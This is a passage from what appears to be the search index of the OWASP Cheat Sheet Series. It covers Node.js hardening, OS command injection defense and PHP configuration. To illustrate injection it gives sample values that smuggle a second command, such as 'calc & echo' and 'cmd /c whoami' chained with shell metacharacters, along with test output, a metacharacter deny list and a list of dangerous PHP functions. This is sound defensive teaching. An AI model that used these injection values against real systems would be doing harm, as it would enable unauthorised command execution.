"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#monitor-the-event-loop","title":"Monitor the event loop","text":"

When your application server is under heavy network traffic, it may not be able to serve its users. This is essentially a type of Denial of Service (DoS) attack. The toobusy-js module allows you to monitor the event loop. It keeps track of the response time, and when it goes beyond a certain threshold, this module can indicate your server is too busy. In that case, you can stop processing incoming requests and send them 503 Server Too Busy message so that your application stay responsive. Example use of the toobusy-js module is shown here:

const toobusy = require('toobusy-js');\nconst express = require('express');\nconst app = express();\napp.use(function(req, res, next) {\nif (toobusy()) {\n// log if you see necessary\nres.status(503).send(\"Server Too Busy\");\n} else {\nnext();\n}\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#take-precautions-against-brute-forcing","title":"Take precautions against brute-forcing","text":"

Brute-forcing is a common threat to all web applications. Attackers can use brute-forcing as a password guessing attack to obtain account passwords. Therefore, application developers should take precautions against brute-force attacks especially in login pages. Node.js has several modules available for this purpose. Express-bouncer, express-brute and rate-limiter are just some examples. Based on your needs and requirements, you should choose one or more of these modules and use accordingly. Express-bouncer and express-brute modules work similarly. They increase the delay for each failed request and can be arranged for a specific route. These modules can be used as follows:

const bouncer = require('express-bouncer');\nbouncer.whitelist.push('127.0.0.1'); // allow an IP address\n// give a custom error message\nbouncer.blocked = function (req, res, next, remaining) {\nres.status(429).send(\"Too many requests have been made. Please wait \" + remaining/1000 + \" seconds.\");\n};\n// route to protect\napp.post(\"/login\", bouncer.block, function(req, res) {\nif (LoginFailed){  }\nelse {\nbouncer.reset( req );\n}\n});\n
const ExpressBrute = require('express-brute');\n\nconst store = new ExpressBrute.MemoryStore(); // stores state locally, don't use this in production\nconst bruteforce = new ExpressBrute(store);\n\napp.post('/auth',\nbruteforce.prevent, // error 429 if we hit this route too often\nfunction (req, res, next) {\nres.send('Success!');\n}\n);\n

Apart from express-bouncer and express-brute, the rate-limiter module can also help to prevent brute-forcing attacks. It enables specifying how many requests a specific IP address can make during a specified time period.

const limiter = new RateLimiter();\nlimiter.addLimit('/login', 'GET', 5, 500); // login page can be requested 5 times at max within 500 seconds\n

CAPTCHA usage is also another common mechanism used against brute-forcing. There are modules developed for Node.js CAPTCHAs. A common module used in Node.js applications is svg-captcha. It can be used as follows:

const svgCaptcha = require('svg-captcha');\napp.get('/captcha', function (req, res) {\nconst captcha = svgCaptcha.create();\nreq.session.captcha = captcha.text;\nres.type('svg');\nres.status(200).send(captcha.data);\n});\n

Account lockout is a recommended solution to keep attackers away from your valid users. Account lockout is possible with many modules like mongoose. You can refer to this blog post to see how account lockout is implemented in mongoose.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-anti-csrf-tokens","title":"Use Anti-CSRF tokens","text":"

Cross-Site Request Forgery (CSRF) aims to perform authorized actions on behalf of an authenticated user, while the user is unaware of this action. CSRF attacks are generally performed for state-changing requests like changing a password, adding users or placing orders. Csurf is an express middleware that has been used to mitigate CSRF attacks. But a security hole in this package has been recently discovered. The team behind the package has not fixed the discovered vulnerability and they have marked the package as deprecated, recommending using any other CSRF protection package.

For detailed information on cross-site request forgery (CSRF) attacks and prevention methods, you can refer to Cross-Site Request Forgery Prevention.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#remove-unnecessary-routes","title":"Remove unnecessary routes","text":"

A web application should not contain any page that is not used by users, as it may increase the attack surface of the application. Therefore, all unused API routes should be disabled in Node.js applications. This occurs especially in frameworks like Sails and Feathers, as they automatically generate REST API endpoints. For example, in Sails, if a URL does not match a custom route, it may match one of the automatic routes and still generate a response. This situation may lead to results ranging from information leakage to arbitrary command execution. Therefore, before using such frameworks and modules, it is important to know the routes they automatically generate and remove or disable these routes.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#prevent-http-parameter-pollution","title":"Prevent HTTP Parameter Pollution","text":"

HTTP Parameter Pollution(HPP) is an attack in which attackers send multiple HTTP parameters with the same name and this causes your application to interpret them unpredictably. When multiple parameter values are sent, Express populates them in an array. In order to solve this issue, you can use hpp module. When used, this module will ignore all values submitted for a parameter in req.query and/or req.body and just select the last parameter value submitted. You can use it as follows:

const hpp = require('hpp');\napp.use(hpp());\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#only-return-what-is-necessary","title":"Only return what is necessary","text":"

Information about the users of an application is among the most critical information about the application. User tables generally include fields like id, username, full name, email address, birth date, password and in some cases social security numbers. Therefore, when querying and using user objects, you need to return only needed fields as it may be vulnerable to personal information disclosure. This is also correct for other objects stored on the database. If you just need a certain field of an object, you should only return the specific fields required. As an example, you can use a function like the following whenever you need to get information on a user. By doing so, you can only return the fields that are needed for your specific operation. In other words, if you only need to list names of the users available, you are not returning their email addresses or credit card numbers in addition to their full names.

exports.sanitizeUser = function(user) {\nreturn {\nid: user.id,\nusername: user.username,\nfullName: user.fullName\n};\n};\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-object-property-descriptors","title":"Use object property descriptors","text":"

Object properties include three hidden attributes: writable (if false, property value cannot be changed), enumerable (if false, property cannot be used in for loops) and configurable (if false, property cannot be deleted). When defining an object property through assignment, these three hidden attributes are set to true by default. These properties can be set as follows:

const o = {};\nObject.defineProperty(o, \"a\", {\nwritable: true,\nenumerable: true,\nconfigurable: true,\nvalue: \"A\"\n});\n

Apart from these, there are some special functions for object attributes. Object.preventExtensions() prevents new properties from being added to the object.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-access-control-lists","title":"Use access control lists","text":"

Authorization prevents users from acting outside of their intended permissions. In order to do so, users and their roles should be determined with consideration of the principle of least privilege. Each user role should only have access to the resources they must use. For your Node.js applications, you can use the acl module to provide ACL (access control list) implementation. With this module, you can create roles and assign users to these roles.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#error-exception-handling","title":"Error & Exception Handling","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-uncaughtexception","title":"Handle uncaughtException","text":"

Node.js behavior for uncaught exceptions is to print current stack trace and then terminate the thread. However, Node.js allows customization of this behavior. It provides a global object named process that is available to all Node.js applications. It is an EventEmitter object and in case of an uncaught exception, uncaughtException event is emitted and it is brought up to the main event loop. In order to provide a custom behavior for uncaught exceptions, you can bind to this event. However, resuming the application after such an uncaught exception can lead to further problems. Therefore, if you do not want to miss any uncaught exception, you should bind to uncaughtException event and cleanup any allocated resources like file descriptors, handles and similar before shutting down the process. Resuming the application is strongly discouraged as the application will be in an unknown state. It is important to note that when displaying error messages to the user in case of an uncaught exception, detailed information like stack traces should not be revealed to the user. Instead, custom error messages should be shown to the users in order not to cause any information leakage.

process.on(\"uncaughtException\", function(err) {\n// clean up allocated resources\n// log necessary error details to log files\nprocess.exit(); // exit the process to avoid unknown state\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#listen-to-errors-when-using-eventemitter","title":"Listen to errors when using EventEmitter","text":"

When using EventEmitter, errors can occur anywhere in the event chain. Normally, if an error occurs in an EventEmitter object, an error event that has an Error object as an argument is called. However, if there are no attached listeners to that error event, the Error object that is sent as an argument is thrown and becomes an uncaught exception. In short, if you do not handle errors within an EventEmitter object properly, these unhandled errors may crash your application. Therefore, you should always listen to error events when using EventEmitter objects.

const events = require('events');\nconst myEventEmitter = function(){\nevents.EventEmitter.call(this);\n}\nrequire('util').inherits(myEventEmitter, events.EventEmitter);\nmyEventEmitter.prototype.someFunction = function(param1, param2) {\n//in case of an error\nthis.emit('error', err);\n}\nconst emitter = new myEventEmitter();\nemitter.on('error', function(err){\n//Perform necessary error handling here\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-errors-in-asynchronous-calls","title":"Handle errors in asynchronous calls","text":"

Errors that occur within asynchronous callbacks are easy to miss. Therefore, as a general principle first argument to the asynchronous calls should be an Error object. Also, express routes handle errors itself, but it should be always remembered that errors occurred in asynchronous calls made within express routes are not handled, unless an Error object is sent as a first argument.

Errors in these callbacks can be propagated as many times as possible. Each callback that the error has been propagated to can ignore, handle or propagate the error.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#server-security","title":"Server Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately","title":"Set cookie flags appropriately","text":"

Generally, session information is sent using cookies in web applications. However, improper use of HTTP cookies can render an application to several session management vulnerabilities. Some flags can be set for each cookie to prevent these kinds of attacks. httpOnly, Secure and SameSite flags are very important for session cookies. httpOnly flag prevents the cookie from being accessed by client-side JavaScript. This is an effective counter-measure for XSS attacks. Secure flag lets the cookie to be sent only if the communication is over HTTPS. SameSite flag can prevent cookies from being sent in cross-site requests that helps protect against Cross-Site Request Forgery (CSRF) attacks. Apart from these, there are other flags like domain, path and expires. Setting these flags appropriately is encouraged, but they are mostly related to cookie scope not the cookie security. Sample usage of these flags is given in the following example:

const session = require('express-session');\napp.use(session({\nsecret: 'your-secret-key',\nname: 'cookieName',\ncookie: { secure: true, httpOnly: true, path: '/user', sameSite: true}\n}));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-appropriate-security-headers","title":"Use appropriate security headers","text":"

There are several HTTP security headers that can help you prevent some common attack vectors. The helmet package can help to set those headers:

const express = require(\"express\");\nconst helmet = require(\"helmet\");\n\nconst app = express();\n\napp.use(helmet()); // Add various HTTP headers\n

The top-level helmet function is a wrapper around 14 smaller middlewares. Bellow is a list of HTTP security headers covered by helmet middlewares:

app.use(helmet.hsts()); // default configuration\napp.use(\nhelmet.hsts({\nmaxAge: 123456,\nincludeSubDomains: false,\n})\n); // custom configuration\n
app.use(helmet.frameguard()); // default behavior (SAMEORIGIN)\n
app.use(helmet.xssFilter()); // sets \"X-XSS-Protection: 0\"\n

For moderns browsers, it is recommended to implement a strong Content-Security-Policy policy, as detailed in the next section.

app.use(\nhelmet.contentSecurityPolicy({\n// the following directives will be merged into the default helmet CSP policy\ndirectives: {\ndefaultSrc: [\"'self'\"],  // default value for all directives that are absent\nscriptSrc: [\"'self'\"],   // helps prevent XSS attacks\nframeAncestors: [\"'none'\"],  // helps prevent Clickjacking attacks\nimgSrc: [\"'self'\", \"'http://imgexample.com'\"],\nstyleSrc: [\"'none'\"]\n}\n})\n);\n

As this middleware performs very little validation, it is recommended to rely on CSP checkers like CSP Evaluator instead.

app.use(helmet.noSniff());\n
const nocache = require(\"nocache\");\n\napp.use(nocache());\n

The above code sets Cache-Control, Surrogate-Control, Pragma and Expires headers accordingly.

app.use(helmet.ieNoOpen());\n
const expectCt = require('expect-ct');\napp.use(expectCt({ maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123, reportUri: 'http://example.com'}));\n
app.use(helmet.hidePoweredBy());\n

Also, you can lie about the technologies used with this header. For example, even if your application does not use PHP, you can set X-Powered-By header to seem so.

app.use(helmet.hidePoweredBy({ setTo: 'PHP 4.2.0' }));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#platform-security","title":"Platform Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#keep-your-packages-up-to-date","title":"Keep your packages up-to-date","text":"

Security of your application depends directly on how secure the third-party packages you use in your application are. Therefore, it is important to keep your packages up-to-date. It should be noted that Using Components with Known Vulnerabilities is still in the OWASP Top 10. You can use OWASP Dependency-Check to see if any of the packages used in the project has a known vulnerability. Also, you can use Retire.js to check JavaScript libraries with known vulnerabilities.

Starting with version 6, npm introduced audit, which will warn about vulnerable packages:

npm audit\n

npm also introduced a simple way to upgrade the affected packages:

npm audit fix\n

There are several other tools you can use to check your dependencies. A more comprehensive list can be found in Vulnerable Dependency Management CS.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-use-dangerous-functions","title":"Do not use dangerous functions","text":"

There are some JavaScript functions that are dangerous and should only be used where necessary or unavoidable. The first example is the eval() function. This function takes a string argument and executes it as any other JavaScript source code. Combined with user input, this behavior inherently leads to remote code execution vulnerability. Similarly, calls to child_process.exec are also very dangerous. This function acts as a bash interpreter and sends its arguments to /bin/sh. By injecting input to this function, attackers can execute arbitrary commands on the server.

In addition to these functions, some modules require special care when being used. As an example, fs module handles filesystem operations. However, if improperly sanitized user input is fed into this module, your application may become vulnerable to file inclusion and directory traversal vulnerabilities. Similarly, vm module provides APIs for compiling and running code within V8 Virtual Machine contexts. Since it can perform dangerous actions by nature, it should be used within a sandbox.

It would not be fair to say that these functions and modules should not be used whatsoever, however, they should be used carefully especially when they use with user input. Also, there are some other functions that may render your application vulnerable.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#stay-away-from-evil-regexes","title":"Stay away from evil regexes","text":"

The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.

The Regular Expression Denial of Service (ReDoS) is a type of Denial of Service attack that uses regular expressions. Some Regular Expression (Regex) implementations cause extreme situations that makes the application very slow. Attackers can use such regex implementations to cause application to get into these extreme situations and hang for a long time. Such regexes are called evil if application can be stuck on crafted input. Generally, these regexes are exploited by grouping with repetition and alternation with overlapping. For example, the following regular expression ^(([a-z])+.)+[A-Z]([a-z])+$ can be used to specify Java class names. However, a very long string (aaaa...aaaaAaaaaa...aaaa) can also match with this regular expression. There are some tools to check if a regex has a potential for causing denial of service. One example is vuln-regex-detector.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#run-security-linters","title":"Run security linters","text":"

When developing code, keeping all security tips in mind can be really difficult. Also, keeping all team members obey these rules is nearly impossible. This is why there are Static Analysis Security Testing (SAST) tools. These tools do not execute your code, but they simply look for patterns that can contain security risks. As JavaScript is a dynamic and loosely-typed language, linting tools are really essential in the software development life cycle. The linting rules should be reviewed periodically and the findings should be audited. Another advantage of these tools is the feature that you can add custom rules for patterns that you may see dangerous. ESLint and JSHint are commonly used SAST tools for JavaScript linting.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-strict-mode","title":"Use strict mode","text":"

JavaScript has a number of unsafe and dangerous legacy features that should not be used. In order to remove these features, ES5 included a strict mode for developers. With this mode, errors that were silent previously are thrown. It also helps JavaScript engines perform optimizations. With strict mode, previously accepted bad syntax causes real errors. Because of these improvements, you should always use strict mode in your application. In order to enable strict mode, you just need to write \"use strict\"; on top of your code.

The following code will generate a ReferenceError: Can't find variable: y on the console, which will not be displayed unless strict mode is used:

\"use strict\";\n\nfunc();\nfunction func() {\ny = 3.14;   // This will cause an error (y is not defined)\n}\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#adhere-to-general-application-security-principles","title":"Adhere to general application security principles","text":"

This list mainly focuses on issues that are common in Node.js applications, with recommendations and examples. In addition to these, there are general security by design principles that apply to web applications regardless of technologies used in application server. You should also keep those principles in mind while developing your applications. You can always refer to OWASP Cheat Sheet Series to learn more about web application vulnerabilities and mitigation techniques used against them.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#additional-resources-about-nodejs-security","title":"Additional resources about Node.js security","text":"

Awesome Node.js Security resources

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html","title":"OS Command Injection Defense Cheat Sheet","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Command injection (or OS Command Injection) is a type of injection where software that constructs a system command using externally influenced input does not correctly neutralize the input from special elements that can modify the initially intended command.

For example, if the supplied value is:

calc\n

when typed in a Windows command prompt, the application Calculator is displayed.

However, if the supplied value has been tampered with, and now it is:

calc & echo \"test\"\n

when executed, it changes the meaning of the initial intended value.

Now, both the Calculator application and the value test are displayed:

The problem is exacerbated if the compromised process does not follow the principle of least privileges and attacker-controlled commands end up running with special system privileges that increase the amount of damage.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#argument-injection","title":"Argument Injection","text":"

Every OS Command Injection is also an Argument Injection. In this type of attacks, user input can be passed as arguments while executing a specific command.

For example, if the user input is passed through an escape function to escape certain characters like &, |, ;, etc.

system(\"curl \" . escape($url));\n

which will prevent an attacker to run other commands.

However, if the attacker controlled string contains an additional argument of the curl command:

system(\"curl \" . escape(\"--help\"))\n

Now when the above code is executed, it will show the output of curl --help.

Depending upon the system command used, the impact of an Argument injection attack can range from Information Disclosure to critical Remote Code Execution.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-1-avoid-calling-os-commands-directly","title":"Defense Option 1: Avoid calling OS commands directly","text":"

The primary defense is to avoid calling OS commands directly. Built-in library functions are a very good alternative to OS Commands, as they cannot be manipulated to perform tasks other than those it is intended to do.

For example use mkdir() instead of system(\"mkdir /dir_name\").

If there are available libraries or APIs for the language you use, this is the preferred method.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-2-escape-values-added-to-os-commands-specific-to-each-os","title":"Defense option 2: Escape values added to OS commands specific to each OS","text":"

TODO: To enhance.

For examples, see escapeshellarg() in PHP.

The escapeshellarg() surrounds the user input in single quotes, so if the malformed user input is something like & echo \"hello\", the final output will be like calc '& echo \"hello\"' which will be parsed as a single argument to the command calc.

Even though escapeshellarg() prevents OS Command Injection, an attacker can still pass a single argument to the command.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-3-parameterization-in-conjunction-with-input-validation","title":"Defense option 3: Parameterization in conjunction with Input Validation","text":"

If calling a system command that incorporates user-supplied cannot be avoided, the following two layers of defense should be used within software to prevent attacks:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-1","title":"Layer 1","text":"

Parameterization: If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help provide the relevant quoting and encoding.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-2","title":"Layer 2","text":"

Input validation: The values for commands and the relevant arguments should be both validated. There are different degrees of validation for the actual command and its arguments:

Note A:

& |  ; $ > < ` \\ ! ' \" ( )\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

On top of primary defenses, parameterizations, and input validation, we also recommend adopting all of these additional defenses to provide defense in depth.

These additional defenses are:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#code-examples","title":"Code examples","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#java","title":"Java","text":"

In Java, use ProcessBuilder and the command must be separated from its arguments.

Note about the Java's Runtime.exec method behavior:

There are many sites that will tell you that Java's Runtime.exec is exactly the same as C's system function. This is not true. Both allow you to invoke a new program/process.

However, C's system function passes its arguments to the shell (/bin/sh) to be parsed, whereas Runtime.exec tries to split the string into an array of words, then executes the first word in the array with the rest of the words as parameters.

Runtime.exec does NOT try to invoke the shell at any point and does not support shell metacharacters.

The key difference is that much of the functionality provided by the shell that could be used for mischief (chaining commands using &, &&, |, ||, etc, redirecting input and output) would simply end up as a parameter being passed to the first command, likely causing a syntax error or being thrown out as an invalid parameter.

Code to test the note above:

String[] specialChars = new String[]{\"&\", \"&&\", \"|\", \"||\"};\nString payload = \"cmd /c whoami\";\nString cmdTemplate = \"java -version %s \" + payload;\nString cmd;\nProcess p;\nint returnCode;\nfor (String specialChar : specialChars) {\ncmd = String.format(cmdTemplate, specialChar);\nSystem.out.printf(\"#### TEST CMD: %s\\n\", cmd);\np = Runtime.getRuntime().exec(cmd);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n}\nSystem.out.printf(\"#### TEST PAYLOAD ONLY: %s\\n\", payload);\np = Runtime.getRuntime().exec(payload);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n

Result of the test:

##### TEST CMD: java -version & cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version && cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version | cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version || cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST PAYLOAD ONLY: cmd /c whoami\nRC    : 0\nOUT   :\nmydomain\\simpleuser\n\nERROR :\n

Incorrect usage:

ProcessBuilder b = new ProcessBuilder(\"C:\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command together with the arguments are passed as a one string, making it easy to manipulate that expression and inject malicious strings.

Correct Usage:

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This makes it easy to validate each term and reduces the risk of malicious strings being inserted.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\n\nMap<String, String> env = pb.environment();\n\npb.directory(new File(\"TrustedDir\"));\n\nProcess p = pb.start();\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#net","title":".Net","text":"

See relevant details in the DotNet Security Cheat Sheet

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#php","title":"PHP","text":"

In PHP use escapeshellarg() or escapeshellcmd() rather than exec(), system(), passthru().

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#description-of-command-injection-vulnerability","title":"Description of Command Injection Vulnerability","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-avoid-vulnerabilities","title":"How to Avoid Vulnerabilities","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-review-code","title":"How to Review Code","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-test","title":"How to Test","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#external-references","title":"External References","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html","title":"PHP Configuration Cheat Sheet","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page is meant to help those configuring PHP and the web server it is running on to be very secure.

Below you will find information on the proper settings for the php.ini file and instructions on configuring Apache, Nginx, and Caddy web servers.

For general PHP codebase security please refer to the two following great guides:

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-configuration-and-deployment","title":"PHP Configuration and Deployment","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#phpini","title":"php.ini","text":"

Some of following settings need to be adapted to your system, in particular session.save_path, session.cookie_path (e.g. /var/www/mysite), and session.cookie_domain (e.g. ExampleSite.com).

You should also be running PHP 7.2 or later. If running PHP 7.0 and 7.1, you will use slightly different values in a couple of places below (see inline comments). Finally look through the PHP Manual for a complete reference on every value in the php.ini configuration file.

You can find a copy of the following values in a ready-to-go php.ini file here.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-error-handling","title":"PHP error handling","text":"
expose_php\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nerror_reporting\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0E_ALL\ndisplay_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\ndisplay_startup_errors\u00a0\u00a0=\u00a0Off\nlog_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\nerror_log\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/valid_path/PHP-logs/php_error.log\nignore_repeated_errors\u00a0\u00a0=\u00a0Off\n

Keep in mind that you need to have display_errors to Off on a production server and it's a good idea to frequently notice the logs.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-general-settings","title":"PHP general settings","text":"
doc_root\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/DocumentRoot/PHP-scripts/\nopen_basedir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/DocumentRoot/PHP-scripts/\ninclude_path\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-pear/\nextension_dir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-extensions/\nmime_magic.magicfile\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-magic.mime\nallow_url_fopen\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nallow_url_include\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nvariables_order\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0\"GPCS\"\nallow_webdav_methods\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nsession.gc_maxlifetime\u00a0\u00a0=\u00a0600\n

allow_url_* prevents LFIs to be easily escalated to RFIs.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-file-upload-handling","title":"PHP file upload handling","text":"
file_uploads\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\nupload_tmp_dir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-uploads/\nupload_max_filesize\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a02M\nmax_file_uploads\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a02\n

If your application is not using file uploads, and say the only data the user will enter / upload is forms that do not require any document attachments, file_uploads should be turned Off.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-executable-handling","title":"PHP executable handling","text":"
enable_dl\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\ndisable_functions\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0system,\u00a0exec,\u00a0shell_exec,\u00a0passthru,\u00a0phpinfo,\u00a0show_source,\u00a0highlight_file, popen,\u00a0proc_open, fopen_with_path,\u00a0dbmopen,\u00a0dbase_open,\u00a0putenv,\u00a0move_uploaded_file, chdir,\u00a0mkdir,\u00a0rmdir,\u00a0chmod,\u00a0rename, filepro,\u00a0filepro_rowcount,\u00a0filepro_retrieve,\u00a0posix_mkfifo\n#\u00a0see\u00a0also:\u00a0http://ir.php.net/features.safe-mode\ndisable_classes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\n

These are dangerous PHP functions. You should disable all that you don't use.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-session-handling","title":"PHP session handling","text":"

Session settings are some of the MOST important values to concentrate on in configuring. It is a good practice to change session.name to something new.

 session.save_path                = /path/PHP-session/\n session.name                     = myPHPSESSID\n session.auto_start               = Off\n session.use_trans_sid            = 0\n session.cookie_domain            = full.qualified.domain.name\n #session.cookie_path             = /application/path/\n session.use_strict_mode          = 1\n session.use_cookies              = 1\n session.use_only_cookies         = 1\n session.cookie_lifetime          = 14400 # 4 hours\n session.cookie_secure            = 1\n session.cookie_httponly          = 1\n session.cookie_samesite          = Strict\n session.cache_expire             = 30\n session.sid_length               = 256\n session.sid_bits_per_character   = 6 # PHP 7.2+\n session.hash_function\u00a0\u00a0\u00a0         =\u00a01 # PHP 7.0-7.1\n session.hash_bits_per_character\u00a0 =\u00a06 # PHP 7.0-7.1\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#some-more-security-paranoid-checks","title":"Some more security paranoid checks","text":"
